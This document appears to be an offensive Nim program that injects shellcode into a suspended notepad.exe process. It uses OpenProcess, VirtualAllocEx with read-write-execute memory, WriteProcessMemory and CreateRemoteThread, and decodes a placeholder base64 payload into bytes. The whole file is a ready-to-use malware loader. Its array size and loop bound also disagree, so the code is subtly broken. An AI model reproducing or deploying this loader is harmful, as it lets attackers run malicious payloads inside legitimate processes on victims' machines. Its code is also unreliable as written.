# With special thanks to byt3bl33d3r for Offensive Nim!
import winim/lean
import osproc
import base64
import sequtils
import strutils

proc injectCreateRemoteThread[I, T](shellcode: array[I, T]): void =

    let tProcess = startProcess("notepad.exe")
    tProcess.suspend() # That's handy!
    defer: tProcess.close()

    echo "[*] Target Process: ", tProcess.processID

    let pHandle = OpenProcess(
        PROCESS_ALL_ACCESS, 
        false, 
        cast[DWORD](tProcess.processID)
    )
    defer: CloseHandle(pHandle)

    echo "[*] pHandle: ", pHandle

    let rPtr = VirtualAllocEx(
        pHandle,
        NULL,
        cast[SIZE_T](shellcode.len),
        MEM_COMMIT,
        PAGE_EXECUTE_READ_WRITE
    )

    var bytesWritten: SIZE_T
    let wSuccess = WriteProcessMemory(
        pHandle, 
        rPtr,
        unsafeAddr shellcode,
        cast[SIZE_T](shellcode.len),
        addr bytesWritten
    )

    echo "[*] WriteProcessMemory: ", bool(wSuccess)
    echo "    \\-- bytes written: ", bytesWritten
    echo ""

    let tHandle = CreateRemoteThread(
        pHandle, 
        NULL,
        0,
        cast[LPTHREAD_START_ROUTINE](rPtr),
        NULL, 
        0, 
        NULL
    )
    defer: CloseHandle(tHandle)

    echo "[*] tHandle: ", tHandle
    echo "[+] Injected"

    echo "[*] Running in x64 process"

var sc = "Base64 Encoded string of comma-separated bytes goes here"

var sc_seq = base64.decode(sc).split(",")
    .map(proc (h: string): string = strip(h))
    .map(parseHexInt)

var shellcode: array[200626, byte]
for s in 0..200261:
    shellcode[s] = byte sc_seq[s]

# This is essentially the equivalent of 'if __name__ == '__main__' in python
when isMainModule:
    injectCreateRemoteThread(shellcode)